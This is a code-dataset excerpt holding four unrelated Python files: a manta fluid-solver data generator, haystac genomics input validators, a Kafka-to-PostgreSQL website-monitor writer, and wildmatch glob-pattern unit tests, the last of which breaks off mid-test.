text stringlengths 957 885k |
|---|
<reponame>tum-pbs/VOLSIM<gh_stars>1-10
import sys, os, random, shutil, datetime
from manta import *
import numpy as np
sys.path.append(os.getcwd() + '/tensorflow/tools')
import paramhelpers as ph
import imageio
withGUI = False
modes = ["pos", "pos_s", "pos_n", "pos_sn"] # count: 4
modesWave = ["pos", "pos_n"] # count: 2
res = 128
outputFolder = "data/test_verbose"
# parse arguments
if len(sys.argv) == 4:
seed = int(sys.argv[2])
useWaves = sys.argv[3] == "Waves"
mode = modes[int(sys.argv[1])] if not useWaves else modesWave[int(sys.argv[1])]
mantaMsg("--------------------------------------------")
mantaMsg("| Mode: %s" % mode)
mantaMsg("| Seed: %i" % seed)
mantaMsg("| Use Waves: %s" % useWaves)
mantaMsg("--------------------------------------------")
else:
mode = modesWave[0]
seed = 0
useWaves = True
mantaMsg("Wrong parameters!")
exit(1)
# solver params
gs = vec3(res,res,res)
s = Solver(name='main', gridSize = gs, dim=3)
s.timestep = 1.0
# prepare output folders, rendering and log
if not useWaves:
basepath = "%s/shapes_%s/sim_%06d" % (outputFolder, mode, seed)
else:
basepath = "%s/waves_%s/sim_%06d" % (outputFolder, mode, seed)
if not os.path.exists(basepath + "/src"):
os.makedirs(basepath + "/src")
log = {}
log["Timestamp"] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
log["Solver"] = {"Source File": os.path.basename(__file__),
"Timestep": s.timestep, "Resolution": [gs.x, gs.y, gs.z], "Numpy Seed": seed}
if mode == "pos": var = "position"
elif mode == "pos_s": var = "position (smoothed)"
elif mode == "pos_n": var = "position (with noise)"
elif mode == "pos_sn": var = "position (smoothed, with noise)"
log["Variation"] = {"Parameter" : var}
renderpath = basepath + "/render/"
if not os.path.exists(renderpath):
os.makedirs(renderpath)
renderData = {"flagsMean" : []}
# prepare grids
shapeGrid = s.create(RealGrid)
noise = s.create(RealGrid)
flags = s.create(FlagGrid) # unused! dummy for gui
vel = s.create(VecGrid) # unused! dummy for gui
flags.fillGrid()
# setup shapes
numShapes = np.random.randint(1,6) if not useWaves else np.random.randint(1,4)
shapeTypes = np.random.rand(numShapes)
starts = np.zeros((numShapes, 3))
ends = np.zeros((numShapes, 3))
for i in range(numShapes):
while True:
starts[i] = res * np.random.rand(3)
ends[i] = res * np.random.rand(3)
# clamp away from boundary by maximum possible radius
dist = (0.25)*np.linalg.norm(ends[i]-starts[i])
starts[i] = np.maximum(starts[i], dist)
starts[i] = np.minimum(starts[i], res-dist)
ends[i] = np.maximum(ends[i], dist)
ends[i] = np.minimum(ends[i], res-dist)
if np.linalg.norm(ends[i]-starts[i]) > 0.3*res:
break
moveDirs = ends - starts
distances = np.linalg.norm(moveDirs, axis=1)
mantaMsg(str(numShapes))
mantaMsg(str(distances))
radii = np.zeros(numShapes)
for i in range(numShapes):
if not useWaves:
radii[i] = np.random.randint(0.1*distances[i], 0.2*distances[i])
shapeType = "Sphere" if shapeTypes[i] > 0.5 else "Box"
else:
radii[i] = np.random.randint(0.4*distances[i], 0.8*distances[i])
shapeType = "Wave"
log["Shape " + str(i)] = {"Type": shapeType, "Start": list(starts[i]), "End": list(ends[i]), "Radius": radii[i]}
if withGUI:
gui = Gui()
gui.show( True )
# helper function for mp4 export
def prepareRender(data, mode):
assert mode in ["mean", "slice"]
if mode == "mean":
data = np.mean(data, axis=0)
else:
data = data[int(res/2)]
data = data - np.min(data)
data = data / np.max(data)
data = 255*data
data = np.flip(data, axis=0)
return data.astype(np.uint8)
#main loop
amounts = range(0,11)
for amount in amounts:
mantaMsg('%s: %0.4f' % (mode, amount))
shapeGrid.setConst(0.)
for i in range(numShapes):
frac = float(amount) / float(max(amounts))
pos = vec3(starts[i,0], starts[i,1], starts[i,2]) + vec3(frac*moveDirs[i,0], frac*moveDirs[i,1], frac*moveDirs[i,2])
if not useWaves:
if shapeTypes[i] > 0.5:
shapeObj = s.create(Sphere, center=pos, radius=radii[i])
else:
shapeObj = s.create(Box, center=pos, size=vec3(0.85*radii[i], 0.85*radii[i], 0.85*radii[i]))
if mode == "pos_s" or mode == "pos_sn":
shapeObj.applyToGridSmooth(shapeGrid, value=1)
else:
shapeObj.applyToGrid(shapeGrid, value=1)
else:
applyWaveToGrid(shapeGrid, center=pos, radius=radii[i], waviness=0.2*shapeTypes[i])
if mode == "pos_n" or mode == "pos_sn":
if not useWaves:
noiseStrength = 0.25
else:
noiseStrength = 0.10
noiseSeed = random.randint(0, 999999999)
noiseMode = "normal"
createRandomField(noise=noise, strength=noiseStrength, bWidth=0, mode=noiseMode, seed=noiseSeed)
shapeGrid.add(noise)
log["Noise"] = {"Strength" : noiseStrength, "Seed" : noiseSeed, "Mode" : noiseMode}
# save data
flagsNP = np.zeros([res, res, res, 1])
copyGridToArrayReal( target=flagsNP, source=shapeGrid )
np.savez_compressed( "%s/flags_%06d_part%02d.npz" % (basepath, 0, amount), flagsNP.astype(np.float32) )
renderData["flagsMean"].append( prepareRender(flagsNP, "mean") )
s.step()
# save meta information
ph.writeParams(basepath + "/src/description.json", log)
shutil.copy(os.path.abspath(__file__), basepath + "/src/%s" % os.path.basename(__file__))
for key in renderData.keys():
if not useWaves:
outPath = "%sshapes_%s_sim_%06d.mp4" % (renderpath, mode, seed)
else:
outPath = "%swaves_%s_sim_%06d.mp4" % (renderpath, mode, seed)
#imageio.mimwrite(outPath, renderData[key], quality=6, fps=10, output_params=['-codec:v', 'copy', outPath])
imageio.mimwrite(outPath, renderData[key], quality=8, fps=2, ffmpeg_log_level="error") |
<reponame>antonisdim/haystack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2020, University of Oxford"
__email__ = "<EMAIL>"
__license__ = "MIT"
import argparse
import hashlib
import os
import re
import sys
import pandas as pd
import yaml
REGEX_WHITELIST = r"[\w.-]+"
REGEX_BLACKLIST = r"[^\w.-]+"
PE = "PE"
COLLAPSED = "COLLAPSED"
SE = "SE"
WARNING = "\x1b[33m"
FAIL = "\x1b[31m"
END = "\033[0m"
WARNING_DB = 0
WARNING_USER = 0
is_tty = sys.stdout.isatty()
class ValidationError(Exception):
pass
class ArgumentCustomFormatter(argparse.HelpFormatter):
"""
Custom formatter for argparse
"""
def _get_help_string(self, action):
message = action.help
if "%(default)" not in action.help:
if action.default is not argparse.SUPPRESS and action.default is not None:
defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
message += " (default: %(default)s)"
return message
class WritablePathType(object):
"""
Is this a writable path.
"""
def __call__(self, value):
from pathlib import Path
try:
path = Path(value).expanduser()
path.mkdir(parents=True, exist_ok=True)
return value
except Exception:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid writable path")
class PositiveIntType(object):
"""
Is this a positive integer
"""
def __call__(self, value):
try:
if not int(value) > 0:
raise ValueError()
except ValueError:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid positive integer")
return int(value)
class RangeType(object):
"""
Is this a valid instance of `_type` and within the range [lower, upper]
"""
def __init__(self, _type, lower, upper):
self.type = _type
self.lower = lower
self.upper = upper
def __call__(self, value):
try:
if not (self.lower <= self.type(value) <= self.upper):
raise ValueError()
except ValueError:
raise argparse.ArgumentTypeError(
f"'{value}' is not a valid {self.type.__name__} in the range ({self.lower}, {self.upper})"
)
return self.type(value)
class FloatRangeType(RangeType):
"""
Is this a float() within the given range
"""
def __init__(self, lower, upper):
super().__init__(float, lower, upper)
class IntRangeType(RangeType):
"""
Is this an int() within the given range
"""
def __init__(self, lower, upper):
super().__init__(int, lower, upper)
class BoolType(object):
"""
Is this a valid boolean
"""
def __call__(self, value):
if isinstance(value, bool):
return value
if value.lower() in ("yes", "true", "t", "y", "1"):
return True
elif value.lower() in ("no", "false", "f", "n", "0"):
return False
else:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid boolean")
class JsonType(object):
"""
Is this a valid JSON string
"""
def __call__(self, value):
import json
try:
return json.loads(value)
except json.decoder.JSONDecodeError as error:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid JSON string\n {error}")
class SpreadsheetFileType(object):
"""
Is it a valid user input file
"""
cols = None
data = None
def __call__(self, value):
if not os.path.exists(value):
raise argparse.ArgumentTypeError(f"'{value}' does not exit")
if os.stat(value).st_size == 0:
raise argparse.ArgumentTypeError(f"'{value}' is empty")
try:
self.data = pd.read_table(
value,
sep="\t",
header=None,
index_col=False,
)
except Exception:
raise argparse.ArgumentTypeError(f"'{value}' unknown error parsing file")
if len(self.data.columns) != len(self.cols):
raise argparse.ArgumentTypeError(
f"'{value}' must have {len(self.cols)} columns and be tab delimited (cols={len(self.data.columns)})"
)
# find the row number of any empty cells
bad_rows = ", ".join([str(i + 1) for i in self.data.index[self.data.isnull().any(axis=1)].tolist()])
if bad_rows:
raise argparse.ArgumentTypeError(f"'{value}' contains missing data in line(s): {bad_rows}")
return value
class AccessionFileType(SpreadsheetFileType):
"""
Is this a valid accession input file.
"""
cols = ["species", "accession"]
def __call__(self, value):
super().__call__(value)
# check all accessions pass the regex pattern
idx = self.cols.index("accession")
species = self.cols.index("species")
bad_list_acc = "\n".join(
[
f"line {i + 1}: '{acc}'"
for i, acc in enumerate(self.data[idx].tolist())
if re.match(REGEX_BLACKLIST, acc) is not None
]
)
bad_list_species = "\n".join(
[
f"line {i + 1}: '{tax}'"
for i, tax in enumerate(self.data[species].tolist())
if re.match(REGEX_BLACKLIST, tax) is not None
]
)
if bad_list_acc or bad_list_species:
bad_list = bad_list_acc + "\n" + bad_list_species
raise argparse.ArgumentTypeError(
f"'{value}' these accession codes or taxon names contain invalid characters:\n{bad_list}"
)
return value
class SequenceFileType(AccessionFileType):
"""
Is this a valid sequence input file.
"""
cols = ["species", "accession", "path"]
def __call__(self, value):
super().__call__(value)
# find any files that don't exist or are empty
idx = self.cols.index("path")
bad_files = "\n".join(
[
f"line {i + 1}: '{file}'"
for i, file in enumerate(self.data[idx].tolist())
if not os.path.exists(file) or os.stat(file).st_size == 0
]
)
if bad_files:
raise argparse.ArgumentTypeError(f"'{value}' these sequence files do not exist or are empty:\n{bad_files}")
return value
class SraAccessionType(object):
"""
Is this a valid SRA accession
"""
def __call__(self, value):
# import these locally to avoid cyclic import issues
from haystac.workflow.scripts.entrez_utils import entrez_esearch, entrez_efetch
try:
# query the SRA to see if this a valid accession
_, _, id_list = entrez_esearch("sra", f"{value}[Accession]")
etree = entrez_efetch("sra", id_list)
except Exception:
raise argparse.ArgumentTypeError(f"Invalid SRA accession '{value}'")
run_code = etree.find(".//RUN").attrib["accession"]
if len(id_list) > 1 or value != run_code:
raise argparse.ArgumentTypeError(
f"The SRA accession you have provided {value} does not refer to a sequencing run. "
f"Please visit https://www.ncbi.nlm.nih.gov/sra/ and chose a valid "
f"sequencing run accession for the SRA accession {value}."
)
try:
# now get the library layout
layout = etree.find(".//LIBRARY_LAYOUT/*").tag.lower()
except Exception:
raise argparse.ArgumentTypeError(f"Unable to resolve the library layout for SRA accession '{value}'")
return value, layout
class NuccoreQueryType(object):
"""
Is this a valid nuccore query
"""
def __call__(self, value):
# import these locally to avoid cyclic import issues
from haystac.workflow.scripts.entrez_utils import entrez_esearch
# check if the user has given us a file instead of a string
if os.path.isfile(value):
query = open(value).read().strip()
if not query:
raise argparse.ArgumentTypeError(f"The query file '{value}' is empty.")
else:
query = value
try:
# query nuccore to see if this a valid query
_, _, id_list = entrez_esearch("nuccore", f"{query}")
except Exception:
raise argparse.ArgumentTypeError(f"Invalid NCBI query '{query}'")
# if the query returns no result set raise error
if len(id_list) == 0:
raise argparse.ArgumentTypeError(f"No results in NCBI nucleotide for query '{query}'")
return value
class CheckExistingConfig(object):
"""
Checks the details of an existing yaml file against cli params or another yaml file
"""
def __init__(self, filename, params):
# check if second argument is a dict or a yaml file
if isinstance(params, dict):
params_config = params
elif os.path.isfile(params):
with open(params, "r") as fin_params:
params_config = yaml.safe_load(fin_params)
# check if a config already exists
if not os.path.isfile(filename):
pass
else:
# open the config file
with open(filename, "r") as fin:
existing_config = yaml.safe_load(fin)
if not isinstance(params, dict):
important_args = ["cache"]
else:
important_args = [
"cache",
"api_key",
"mismatch_probability",
"bowtie2_scaling",
"query",
"query_file",
"accessions_file",
"sequences_file",
"refseq_rep",
# "force_accessions",
# "exclude_accessions",
# "resolve_accessions",
"rank",
"mtDNA",
"aDNA",
"seed",
"fastq",
"fastq_r1",
"fastq_r2",
"sra",
"collapse",
"trim_adapters",
"sample",
"min_prob",
"query_file_md5",
"accessions_md5",
"sequences_md5",
]
for arg in important_args:
# check if all the important params match
if arg in existing_config.keys() and arg in params_config.keys():
if existing_config[arg] != params_config[arg]:
print_error(
f"You are trying to set a value for parameter {arg} on top of an already existing one "
f"(old: {existing_config[arg]}, new: {params_config[arg]}). "
f"Please either revert to the original parameter you used or create a "
f"new output directory."
)
class FastqFile(object):
"""
Is it a valid user input fastq file
"""
def __call__(self, value):
if not os.path.exists(value):
raise argparse.ArgumentTypeError(f"'{value}' does not exit")
if os.stat(value).st_size == 0:
raise argparse.ArgumentTypeError(f"'{value}' is empty")
if ".gz" not in value:
with open(value, "r") as fin:
first_line = fin.readline()
else:
import gzip
with gzip.open(value, "rt") as fin:
first_line = fin.readline()
if first_line[0] != "@":
raise argparse.ArgumentTypeError(f"'{value}' is not a valid fastq file.")
return value
class BatchType(object):
"""
Is this a valid smk batch string
"""
def __call__(self, value):
try:
rulename, batch, batches = (
value.split("=")[0],
int(value.split("=")[1].split("/")[0]),
int(value.split("=")[1].split("/")[1]),
)
return rulename, batch, batches
except IndexError as error:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid snakemake batch string\n {error}")
def get_total_paths(
checkpoints,
config,
):
"""
Get all the individual fasta file paths for the taxa in our database.
"""
sequences_df = pd.DataFrame()
if config["query"]:
pick_sequences = checkpoints.entrez_pick_sequences.get()
sequences_df = pd.read_csv(pick_sequences.output[0], sep="\t")
assert len(sequences_df) > 0, f"The entrez pick sequences file is empty {pick_sequences.output[0]}"
if config["refseq_rep"]:
sources = []
# refseq rep prok
if config["refseq_rep"] == "prokaryote_rep":
refseq_rep_prok = checkpoints.entrez_refseq_rep_prok_accessions.get()
refseq_genomes = pd.read_csv(refseq_rep_prok.output.refseq_genomes, sep="\t")
genbank_genomes = pd.read_csv(refseq_rep_prok.output.genbank_genomes, sep="\t")
assemblies = pd.read_csv(refseq_rep_prok.output.assemblies, sep="\t")
refseq_plasmids = pd.read_csv(refseq_rep_prok.output.refseq_plasmids, sep="\t")
genbank_plasmids = pd.read_csv(refseq_rep_prok.output.genbank_plasmids, sep="\t")
if not config["force_accessions"]:
invalid_assemblies = checkpoints.entrez_invalid_assemblies.get()
invalid_assembly_sequences = pd.read_csv(invalid_assemblies.output[0], sep="\t")
assemblies = assemblies[
~assemblies["AccessionVersion"].isin(invalid_assembly_sequences["AccessionVersion"])
]
sources = [
refseq_genomes,
genbank_genomes,
assemblies,
refseq_plasmids,
genbank_plasmids,
]
# refseq viruses
elif config["refseq_rep"] == "viruses":
refseq_viruses = checkpoints.entrez_refseq_viruses_accessions.get()
refseq_viral_genomes = pd.read_csv(refseq_viruses.output.refseq_viruses, sep="\t")
sources = [refseq_viral_genomes]
# refseq eukaryotes
elif config["refseq_rep"] == "eukaryotes":
refseq_eukaryotes = checkpoints.entrez_refseq_eukaryotes_accessions.get()
refseq_euk_genomes = pd.read_csv(refseq_eukaryotes.output.refseq_euk, sep="\t")
sources = [refseq_euk_genomes]
if config["query"]:
sources.append(sequences_df)
sequences_df = pd.concat(sources)
if config["sequences"] or config["accessions"]:
check_unique_taxa_in_custom_inputs(config["accessions"], config["sequences"])
if config["sequences"]:
custom_fasta_paths = pd.read_csv(
config["sequences"],
sep="\t",
header=None,
names=["species", "AccessionVersion", "path"],
)
custom_fasta_paths = check_unique_taxa_accs(custom_fasta_paths, config, config["sequences"], "user_file")
custom_seqs = custom_fasta_paths[["species", "AccessionVersion"]].copy()
custom_seqs["AccessionVersion"] = "custom_seq-" + custom_seqs["AccessionVersion"].astype(str)
sequences_df = sequences_df.append(custom_seqs)
if config["accessions"]:
custom_accessions = pd.read_csv(
config["accessions"],
sep="\t",
header=None,
names=["species", "AccessionVersion"],
)
custom_accessions = check_unique_taxa_accs(custom_accessions, config, config["accessions"], "user_file")
sequences_df = sequences_df.append(custom_accessions)
if config["genera"]:
sequences_df = sequences_df[sequences_df["species"].str.contains("|".join(config["genera"]))]
if config["exclude_accessions"]:
sequences_df = sequences_df[~sequences_df["AccessionVersion"].isin(config["exclude_accessions"])]
# check that db accessions are unique
sequences_df = check_unique_taxa_accs(sequences_df, config, "", "db")
inputs = []
for key, seq in sequences_df.iterrows():
orgname, accession = (
normalise_name(seq["species"]),
seq["AccessionVersion"],
)
inputs.append((orgname, accession))
return inputs
def normalise_name(taxon):
"""remove unnecessary characters from a taxon name string."""
return re.sub(REGEX_BLACKLIST, "_", taxon)
def check_unique_taxa_in_custom_inputs(accessions, sequences):
"""Checks that custom input files have only one entry per taxon"""
if accessions != "" and sequences != "":
custom_fasta_paths = pd.read_csv(sequences, sep="\t", header=None, names=["species", "accession", "path"])
custom_accessions = pd.read_csv(accessions, sep="\t", header=None, names=["species", "accession"])
# check if any taxa in common
taxon_acc = custom_accessions["species"].tolist()
taxon_seq = custom_fasta_paths["species"].tolist()
if bool(set(taxon_acc) & set(taxon_seq)):
print_error(
"You have provided the same taxon both in your custom sequences "
"file and your custom accessions file. Please pick and keep ONLY "
"one entry from both of these files. You can only have 1 sequence "
"per chosen taxon in your database."
)
# check if any accessions in common
accession_acc = custom_accessions["accession"].tolist()
accession_seq = custom_fasta_paths["accession"].tolist()
if bool(set(accession_acc) & set(accession_seq)):
print_error(
"You have provided the same accession both in your custom sequences "
"file and your custom accessions file. Please pick and keep ONLY "
"one entry from both of these files, or change the accession entry "
"appropriately in your custom sequences file. You can only have 1 accession name "
"per chosen taxon in your database."
)
def check_unique_taxa_accs(df, config, user_input, to_check):
"""Checks that there are only unique inputs for taxa and accessions"""
# if we are checking the user files
if to_check == "user_file":
# if duplicate accession in user file raise error
if df["AccessionVersion"].duplicated().any():
dup_acc = [i for i in df[df["AccessionVersion"].duplicated()]["AccessionVersion"].to_list()]
message = (
f"{user_input} contains multiple taxa for {', '.join(dup_acc)}. "
f"Please remove/fix all duplicates. Picking automatically a taxon/accession pair in "
f"this case is not possible."
)
print_error(message)
# if duplicate species in user file either raise error, or --resolve-accessions
elif df["species"].duplicated().any():
dup_taxa = [i for i in df[df["species"].duplicated()]["species"].to_list()]
message = f"{user_input} contains multiple sequences for {', '.join(dup_taxa)}. "
if not config["resolve_accessions"]:
message += (
"Either remove all duplicates, or set the `--resolve-accessions` flag to automatically choose one. "
"It is the first accession that will be chosen."
)
print_error(message)
else:
# global WARNING_USER
for idx, val in df[df["species"].duplicated(keep="first")].iterrows():
message += f"Accession {val['AccessionVersion']} for {val['species']} was omitted."
# if WARNING_USER == 0:
print_warning(message)
# WARNING_USER += 1
df = df[~df["species"].duplicated(keep="first")]
return df
# if all good return df as is
else:
return df
# if we are checking the database in total
elif to_check == "db":
# if duplicate accessions in db either raise error, or --resolve-accessions
if df["AccessionVersion"].duplicated().any():
dup_acc = [i for i in df[df["AccessionVersion"].duplicated()]["AccessionVersion"].to_list()]
dup_tax = [i for i in df[df["AccessionVersion"].duplicated(keep=False)]["species"].to_list()]
message = (
f"Accession {', '.join(dup_acc)} appears multiple times in the database "
f"with different taxa names ({', '.join(dup_tax)}). "
)
if not config["resolve_accessions"]:
message += (
f"Please remove/fix all duplicate accessions if possible. "
f"If multiple taxa have the same accession, "
f"that is possibly due to a recent change in NCBI's taxonomy, and it is strongly "
f"advised you check the latest information for these accessions. "
f"Either specify unique pairs of taxa and accessions using the `--accessions-file` or "
f"`--sequences-file` flags, or set the `--resolve-accessions` flag to automatically "
f"choose the first one. "
)
print_error(message)
else:
# global WARNING_DB
for idx, val in df[df["AccessionVersion"].duplicated(keep="first")].iterrows():
message += (
f"{val['species']} has been excluded. It is strongly advised to "
f"check the latest taxonomy info on NCBI."
)
# if WARNING_DB == 0:
print_warning(message)
# WARNING_DB += 1
df = df[~df["AccessionVersion"].duplicated(keep="first")]
return df
# if all good return df as id
else:
return df
def get_final_db_paths(checkpoints, config):
"""Get all the taxon/acc pairs for the taxa in our database."""
db_sequences = checkpoints.entrez_db_list.get()
sequences_df = pd.read_csv(db_sequences.output[0], sep="\t", names=["species", "AccessionVersion"])
if config["genera"]:
sequences_df = sequences_df[sequences_df["species"].str.contains("|".join(config["genera"]))]
assert len(sequences_df) > 0, (
f"The db file containing the taxon/accession pairs is empty {db_sequences.output[0]}. "
f"Please rebuild the database."
)
inputs = []
for key, seq in sequences_df.iterrows():
orgname, accession = (
normalise_name(seq["species"]),
seq["AccessionVersion"],
)
inputs.append((orgname, accession))
return inputs
def chunker(seq, size):
return (seq[pos : pos + size] for pos in range(0, len(seq), size))
def md5(filename):
hash_md5 = hashlib.md5()
# open file and get the checksum
with open(filename, "rb") as f:
# read it in chunks in case the file is big
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def print_error(message):
"""Function to print errors and exit"""
message = f"haystac: error: {message}"
print(f"{FAIL}{message}{END}" if is_tty else message, file=sys.stderr)
exit(1)
def print_warning(message):
"""Function to print warnings"""
message = f"WARNING: {message}"
print(f"{WARNING}{message}{END}" if is_tty else message, file=sys.stderr)
def get_smk_config():
"""Function to read the smk config and return a dictionary"""
try:
with open(".snakemake/config.yaml") as fin:
config = yaml.safe_load(fin)
except FileNotFoundError:
config = {}
return config
|
<reponame>yujungcheng/website-monitor<filename>run_writer.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
import json
import daemon
import os
from datetime import datetime
from argparse import ArgumentParser
from common.utils import *
from common.kafka import Kafka
from common.database import PostgreSQL
from pykafka.exceptions import SocketDisconnectedError, LeaderNotAvailable
def main(argv, log):
log.info(f'Writer start.')
websites = dict()
config_file = './config.ini' # default config file name
db = None
kf = None
try:
if args.config != None:
config_file = args.config
log.info(f'configure file: {config_file}')
db_cfg = get_config(config_file, 'postgre')
for key in ('host', 'port', 'dbname', 'user', 'password'):
if key not in db_cfg:
raise(f'database config missing {key}.')
db = PostgreSQL(db_cfg['host'],
db_cfg['port'],
db_cfg['dbname'],
db_cfg['user'],
db_cfg['password'],
log=log)
if db.connect() != True: # set connection
log.error("unable to connect database.")
raise Exception("error to set kafka client.")
db.initialise_database() # create tables if not exist
# get all websites from database
rows = db.get_website()
for row in rows:
name = row[0]
url = row[1]
websites[name] = url
log.info(f'websites in database: {websites}')
# read kafka config
kf_cfg = get_config(config_file, 'kafka')
for key in ('host', 'port', 'cafile', 'certfile', 'keyfile', 'topic'):
if key not in kf_cfg:
raise(f'kafka config missing {key}.')
kf = Kafka(kf_cfg['host'],
kf_cfg['port'],
kf_cfg['cafile'],
kf_cfg['certfile'],
kf_cfg['keyfile'],
log)
if kf.set_client() == False: # set kafka client
raise Exception("error to set kafka client.")
topic_name = kf_cfg['topic']
topic = kf.get_topic(topic_name)
if topic == False:
raise Exception("error to get kafka topic.")
# get topic offset from database.
row = db.get_topic_offset(topic_name)
if row == False:
log.info(f'add topic to database.')
now = datetime.now()
created_time = now.strftime("%d-%m-%Y %H:%M:%S")
db.add_topic(topic_name, created_time)
db_offset = 0
else:
log.info(f'topic offset in database is {row}.')
db_offset = int(row[0])
# ger kafka topic consumer
consumer_group_name = 'writer'
log.info(f'get simple consumer, group={consumer_group_name}')
consumer = topic.get_simple_consumer(
consumer_group=consumer_group_name,
consumer_timeout_ms=2000)
log.info(f'start consuming messages.')
while True:
results = [] # bulk results to store into database
for i in range(0, 100):
try:
message = consumer.consume()
if message == None:
break
except (SocketDisconnectedError) as e:
# handling connection loss
log.warning(f'consumer socket disconnect. {e}')
time.sleep(1)
consumer = topic.get_simple_consumer(
consumer_group=consumer_group_name,
consumer_timeout_ms=2000)
break
except Exception as e:
log.warning(f'consumer exception occur. {e}')
break
# processing message
log.debug(f'consuming message, offset={message.offset}')
result = json.loads(message.value.decode('utf-8'))
name = result['name']
url = result['url']
# append new offset result to bulk result when offset value
# in database is less than offset value in kafka topic
if db_offset < message.offset:
if name not in websites: # add new website to database
now = datetime.now()
created_time = now.strftime("%d-%m-%Y %H:%M:%S")
log.info(f'add new website {name}, {url}')
db.add_website(created_time, name, url)
websites[name] = url
created_at = result['created_at']
status_code = result['status_code']
response_time = result['response_time']
content_check = result['content_check']
values = (created_at, name, status_code,
response_time, content_check)
results.append(values)
# write results to database
if results != []:
result_count = len(results)
log.debug(f'write {result_count} new results to database.')
db_offset += result_count
db.add_check_results(results, topic_name, db_offset)
except Exception as e:
log.error(e)
except KeyboardInterrupt:
log.info("stop running writer.")
finally:
if db != None:
db.disconnect()
if __name__ == "__main__":
name = 'writer'
parser = ArgumentParser(description=f'Website monitor - {name}')
parser.add_argument('--daemon', action='store_true', help='daemon mode')
parser.add_argument('--config', help='config file path')
parser.add_argument('--debug', action='store_true', help='enable debug')
parser.add_argument('--filelog', action='store_true', help='log to file')
args = parser.parse_args()
if args.debug:
if args.filelog:
log = get_log(name=name, level=logging.DEBUG, filelog=True)
else:
log = get_log(name=name, level=logging.DEBUG)
else:
if args.filelog:
log = get_log(name=name, filelog=True)
else:
log = get_log(name=name)
if args.daemon: # run in deamon mode
with daemon.DaemonContext(working_directory=os.getcwd()):
main(args, log)
else:
main(args, log)
|
# -*- coding: utf8 -*-
u"""
Unit-test for the wildmatch module
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import pathmatch.wildmatch as wildmatch
from pathmatch.helpers import generate_tests
# TODO: convert all tests to parametrized generated tests
@generate_tests(
match_wild_star=[
# Basic wildmatch features
# Literal match
(u'foo', u'foo', True),
(u'foo', u'bar', False),
(u'', u'', True),
# Quantifiers
(u'???', u'foo', True),
(u'??', u'foo', False),
(u'*', u'foo', True),
(u'f*', u'foo', True),
(u'*f', u'foo', False),
(u'*foo*', u'foo', True),
(u'*ob*a*r*', u'foobar', True),
(u'*ab', u'aaaaaaabababab', True),
(u'foo', u'foo', True),
(u'foo', u'bar', False),
(u'', u'', True),
]
)
class TestWildmatchFunctions(unittest.TestCase):
u"""
TestCase for the wildmatch functions
"""
def parse_bracket_expression(self, pattern, expected_matching, expected_items=()):
# print(repr(pattern))
if expected_matching is None:
with self.assertRaises(Exception):
wildmatch._parse_bracket_expression(pattern)
else:
be, be_len = wildmatch._parse_bracket_expression(pattern)
actual_matching, actual_items = wildmatch._read_bracket_expression(be)
self.assertEqual(expected_matching, actual_matching)
self.assertEqual(tuple(expected_items), tuple(actual_items))
def match_wild_star(self, pattern, text, result):
if result is None: # Expect error
# msg = u'Expect match({}, {}) to raise an error'.format(repr(pattern), repr(text))
# print(msg)
with self.assertRaises(Exception):
wildmatch.translate(pattern, wild_star=True)
else:
# msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
# print(msg)
regex = wildmatch.translate(pattern, wild_star=True)
# print(repr(regex.pattern))
self.assertEqual(result, regex.match(text) is not None)
def match(self, pattern, text, result):
msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
self.assertEqual(result, wildmatch.match(pattern, text, wild_star=False, path_name=False), msg)
def match_case_fold(self, pattern, text, result):
msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
self.assertEqual(result, wildmatch.match(pattern, text, case_fold=True), msg)
def translate(self, pattern, regex_pattern):
translated = wildmatch.translate(pattern)
self.assertEqual(translated.pattern, regex_pattern)
def test_match(self):
# Basic wildmatch features
# Literal match
self.match_wild_star(u'foo', u'foo', True)
self.match_wild_star(u'foo', u'bar', False)
self.match_wild_star(u'', u'', True)
# Quantifiers
self.match_wild_star(u'???', u'foo', True)
self.match_wild_star(u'??', u'foo', False)
self.match_wild_star(u'*', u'foo', True)
self.match_wild_star(u'f*', u'foo', True)
self.match_wild_star(u'*f', u'foo', False)
self.match_wild_star(u'*foo*', u'foo', True)
self.match_wild_star(u'*ob*a*r*', u'foobar', True)
self.match_wild_star(u'*ab', u'aaaaaaabababab', True)
# Escaped literal
self.match_wild_star(u'foo\\*', u'foo*', True)
self.match_wild_star(u'foo\\*bar', u'foobar', False)
self.match_wild_star(u'f\\\\oo', u'f\\oo', True)
# Bracket expression
self.match_wild_star(u'*[al]?', u'ball', True)
self.match_wild_star(u'[ten]', u'ten', False)
# self.match_wild_star(u'**[!te]', u'ten', False) # ** interpreted as wildstar ?
# self.match_wild_star(u'**[!ten]', u'ten', False) # ** interpreted as wildstar ?
# Negative character class
self.match_wild_star(u't[a-g]n', u'ten', True)
self.match_wild_star(u't[!a-g]n', u'ten', False)
self.match_wild_star(u't[!a-g]n', u'ton', True)
self.match_wild_star(u't[^a-g]n', u'ton', True)
# Bracket expression meta-characters
self.match_wild_star(u'a[]]b', u'a]b', True)
self.match_wild_star(u'a[]-]b', u'a-b', True)
self.match_wild_star(u'a[]-]b', u'a]b', True)
self.match_wild_star(u'a[]-]b', u'aab', False)
self.match_wild_star(u'a[]a-]b', u'aab', True)
self.match_wild_star(u']', u']', True)
# Extended slash-matching features
self.match_wild_star(u'foo*bar', u'foo/baz/bar', False)
# self.match_wild_star(u'foo**bar', u'foo/baz/bar', False)
# self.match_wild_star(u'foo**bar', u'foobazbar', False)
self.match_wild_star(u'foo/**/bar', u'foo/baz/bar', True)
self.match_wild_star(u'foo/**/**/bar', u'foo/baz/bar', True)
self.match_wild_star(u'foo/**/bar', u'foo/b/a/z/bar', True)
